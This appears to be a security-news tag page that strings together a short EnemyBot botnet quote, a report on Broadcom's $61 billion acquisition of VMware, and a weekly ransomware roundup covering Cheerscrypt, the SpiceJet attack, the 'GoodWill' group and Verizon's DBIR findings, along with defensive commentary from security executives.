"This indicates that the Keksec group is well resourced and that the group has developed the malware to take advantage of vulnerabilities before they are patched, thus increasing the speed and scale at which it can spread."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

EnemyBot Linux Botnet Now Exploits Web Server, Android and CMS Vulnerabilities

Massive merger will put Broadcom's Symantec and VMware's Carbon Black under one roof.

Semiconductor vendor Broadcom plans to buy cloud computing firm VMware for a whopping $61 billion in cash and stock.

Broadcom described the acquisition as part of its move to create a global infrastructure technology company. The company also announced that its Broadcom Software Group will be rebranded as VMware.

"VMware has long been recognized for its enterprise software leadership, and through this transaction we will provide customers worldwide with the next generation of infrastructure software. VMware's platform and Broadcom's infrastructure software solutions address different but important enterprise needs, and the combined company will be able to serve them more effectively and securely," said Tom Krause, president of Broadcom Software Group, in a statement. "We have deep respect for VMware's customer focus and innovation track record, and look forward to bringing together our two organizations."

Security-wise, the deal will bring Broadcom's Symantec security division and VMware's Carbon Black unit under one roof. Broadcom acquired Symantec in for $10.7 billion in August 2019, and VMware bought cloud-native endpoint security firm Carbon Black for $2.1 billion in October 2019. 

The deal is expected to close in Broadcom's fiscal year 2023, pending regulatory and VMware shareholder approvals.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Broadcom Snaps Up VMware in $61B Deal

Global ransomware incidents target everything from enterprise servers to grounding an airline, with one India-based group even taking a Robin Hood approach to extortion with the "GoodWill" strain.

Ransomware incidents are on the rise and this week proved no exception, with the discovery of a Linux-based ransomware family called Cheerscrypt targeting VMware ESXi servers and an attack on SpiceJet, India’s second largest airline.  

Meanwhile, an oddball "GoodWill" variant purports to help the needy.

The Cheerscrypt ransomware variant was uncovered by Trend Micro and relies on the double-extortion scheme to coerce victims to pay the ransom – i.e., stealing data as well and threatening to leak it if victims don’t pay up.

Because of the popularity of ESXi servers for creating and running multiple virtual machines (VMs) in enterprise settings, the Cheerscrypt ransomware could be appealing to malicious actors looking to rapidly distribute ransomware across many devices.

Meanwhile, low-cost carrier SpiceJet faced a ransomware attack this week, causing flight delays of between two and five hours as well as rendering unavailable online booking systems and customer service portals.

While the company’s IT team announced on Twitter that it had successfully prevented the attempted attack before it was able to fully breach all internal systems and take them over, customers and employees are still experiencing the ramifications.

**GoodWill: The Altruistic Ransomware  
**Then there's this: Researchers with CloudSEK announced this week they had discovered a Robin Hood-esque ransomware group called GoodWill, which demands that its victims perform three acts of charity in exchange for a decryption key.

GoodWill was discovered in March and uses a ransomware worm that encrypts documents and databases — among other important files — and renders them inaccessible without the decryption key.

The charitable actions that are accepted include taking poor children to fast-food restaurants, donating clothes to the homeless, and providing financial assistance to those in need of medical care. These actions must be backed up by photos posted to social media, the gang demands.

**Businesses Struggle to Keep Pace With Evolving Attacks  
**This week’s spate of ransomware attacks indicated no clear pattern but are rather more akin to the efforts of a marketing and sales department, says Stan Black, CISO at Delinea, a provider of privileged access-management solutions.

“Think about it: They harvest your information, alter their method delivery, they keep coming back until you bite, and when they get you on the hook, they demand a ransom,” he tells Dark Reading. “They are unregulated, don’t answer to legal, a board, or auditors, and don’t care whose business or lives they ruin.”

Black points out that there needs to be a recognition that malicious actors know more about IT operations than organizations think they do.

“For 24 hours a day, they are crawling every facet of our digital footprint and exhaust trail,” he says. “Through automation, they distill our telemetry and create the perfect go-to-market strategy: a cyberattack. These days, ransomware is targeting our identity and access-control security technology — the very tech we thought would protect us.”

Matthew Warner, CTO and co-founder at Blumira, a provider of automated threat detection and response technology, says it’s extremely important that organizations focus on detecting the first three steps of a ransomware attack: discovery, gaining a foothold, and escalating privileges.

"Detection, in addition to being aware as to what data you hold, will allow you to quickly respond to attacks and worst case be sure of post-exploitation handling of a ransomware event," he tells Dark Reading.

He adds that going forward, it also becomes clearer that time to respond and patch has been reduced, down to hours at the most.

“Evaluating your exposed attack surface should be the first item on your list, to ensure that your infrastructure is protected,” Warner says.

**DBIR Report Finds Ransomware Attacks Ballooning  
**Verizon also published its 15th annual "Data Breach Investigations Report" (DBIR), this week, which highlighted the emergence of ransomware-as-a-service (RaaS) as one of the factors behind the ballooning number of ransomware incidents.

The report, which analyzed 23,896 security incidents — of which 5,212 were confirmed breaches — found email phishing and desktop-sharing software were the most common ransomware attack points.

Overall, ransomware accounts for 25% of the total breaches, and was present in 70% of the malware breaches this year.

From Warner’s perspective, ransomware techniques have not necessarily evolved but, rather, have expanded over the last five years. For instance, previously, only certain groups would have the capability to perform advanced attacks that leverage zero-days within days of release. Now, it's no longer required to find your own.

“Now we see ransomware operators either buying or identifying their zero-days and leveraging zero-days as soon as possible within their campaigns,” he notes.

Warner also points out that ransomware operators are leveraging tooling improvements such as Cobalt Strike, enabling their evolution into a virtuous cycle: More funds allow for better tooling, processes, and execution across the environment, which leads to more funds.

That also paves the way for the gangs to expand their teams, as well.

“The ability to perform passive phishing attacks while also actively attacking vulnerable infrastructure with a team of paid hackers creates a unique and powerful environment for ransomware operators,” he explains.

Tag

#vmware